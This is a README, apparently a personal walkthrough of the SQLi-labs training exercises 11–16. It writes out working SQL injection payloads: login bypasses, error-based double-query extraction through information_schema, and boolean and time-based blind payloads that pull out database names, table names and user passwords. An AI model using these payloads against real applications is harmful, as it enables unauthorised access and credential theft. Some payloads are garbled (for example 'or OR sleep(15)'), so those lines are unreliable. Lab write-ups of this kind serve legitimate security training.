itsmeaiswarya/sqli_labs/README.md

   * There is a waiting response from the browser.
 Since the query was able to detect the database it gives us the response.
   * If the database name were incorrect, we would not have got a waiting response.

+## lesson 11 & 12:
+### Post Error-based single & double quotes
+  * There is a login page and we try to login using a username as admin and password as some random value.
+Couldn't login.
+  * Now login, using username and password as single quotes.
+Couldn't login.
+Similarly, the failed login error appears for double quotes for both username and
+  * password.
+But when we enter a double quote for just the username the SQL breaks and has an error.
+  * Using a backslash (/) we get a better understanding of the query.
+We come to the result that we have a double quote followed by the bracket.
+  * Hence we have successfully derived the query.
+  * So the knowledge we take out from this result is that the developer has used the query
+  * Select * from TABLE where username= (“$uname”) and password=(“$password”) LIMIT 0,1
+  * Now in order to fix the query so that it works, we can balance the quotes or comment out the rest of the query.
+  * So I comment out the rest of my query in the username field
+  * Now as I press enter, it becomes a valid query though we are not able to login and it does not give us an error message.
+  * Now we alter the username to “) or 1=1 #: And we are successfully able to login.
+  * Similarly, we may get the records for the second user through the username “) or 1=1 LIMIT 2,1 #
+  * The query simply checks for the second OR condition, validates the user, and prints the record of the second row.

+## lesson 13 & 14:
+### Double-injection single quotes with string
+  * It uses the same mechanism as we have used in this lab.
+  * Inputting a large number or a single quote as a username and password does not work.
+  * It still gives us a “Login Attempt Failed” message.Now we try the double quotes in the username and voila, the query breaks.
+  * So what we can infer from this error message is that there is ‘ “/” and password=” ” LIMIT 0,1 ‘ at line 1
+  * Now we use ” or 1 # to bypass the login and we have success.
+The reason is that the 1 used after OR resolves to true and as a result we have successful query.
+  * The password is not matched since we commented out the rest of the query.
+  * Now we move on to the next query, which is
+  * Select concat((select database()));
+  * This basically selects the database and dumps it as a string.
+If we add the floor and random function to it, it becomes
+  * select concat((select database() ), floor(rand(0)*2 ));
+  * And we have security being concatenated in the output:
+  * We use the information schema table as covered previously to build our query further:
+  * select 1 from (select concat(*), ( concat((select database() ), floor(rand(0)*2 ))c from information_schema.tables group by c)a;
+  * And we use it on the username.
+Please remember to concat your query so that the query gets executed.

+## Lessons 15 & 16
+### Blind Boolean time-based with single and double quotes.
+  * So now we move on to POST Parameter Blind-based Boolean injections which are like 1 or 1=1,
+  * 1 AND 1=1, which means for the first query we have the Boolean value 1 and for the second we also have the Boolean value 1, which equals to TRUE, since an AND function is involved.
+In order to bypass the lab session 16 we use “) or (“1”)=”1 for bypassing the login.
+  * We comment the query by using # if we just want to enter the username.
+  * Now we move on to our next demonstration using Boolean-based blind SQL injections.
+This time we form the query “) or AND sleep(15) #
+  * but the query gets no response.
+We try to correct our query by using “) or OR sleep(15) #
+  * The query eventually becomes select col1, col2 from TABLE where username= (” “) or sleep(15)”) and password=(” user data”);
+  * Now since the “) does not result in TRUE, the AND statement fails and the OR statement executes successfully.
+  * Now if we change our AND query to admin”) or OR sleep(15) # we have a valid query and it results in TRUE, so our query gets successfully executed.
+  * less-15 POST-Blind- Boolian/time Based-Single quotes (based on bool/time delayed single quote POST blind)
+  * Blind-based on Boolean-string
+  * There is no response to any input, so time delay.
+  * Boolean test payload
+  * uname=admin' and 1=1 --+&passwd=admin&submit=Submit //Login successful
+  * uname=admin' and 1=2 --+&passwd=admin&submit=Submit //Login failed
+  * Time delay test payload
+  * uname=admin' and sleep(5) --+&passwd=admin&submit=Submit
+  * Obvious delay, make sure to use delayed injection.
+  * Manual delay injection is the most deadly.
+  * Explode the library, table, column name, value, give it once.
+  * uname=admin' and if(length(database())=8,sleep(5),1)--+&passwd=admin&submit=Submit
+  * uname=admin' and if(left(database(),1)='s',sleep(5),1)--+&passwd=admin&submit=Submit
+  * uname=admin' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+&passwd=admin&submit=Submit
+  * uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+&passwd=admin&submit=Submit
+  * uname=admin' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+&passwd=admin&submit=Submit
+  * uname=admin' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+&passwd=admin&submit=Submit
+  * Less-16 POST-Blind- Boolian/Time Based-Double quotes (based on bool type/time delay double quotes POST type blind)
+  * No matter how I enter this question in the login box, there is no error message displayed, and the guess is that the delayed blind.
+  * Method one, time delay injection
+  * The payload is similar to less-15, just change the single quotation marks from the previous question to double quotation marks and parentheses ") and you're done.
+  * Method two: kinky tricks:
+  * Universal account bypass password verification: admin")#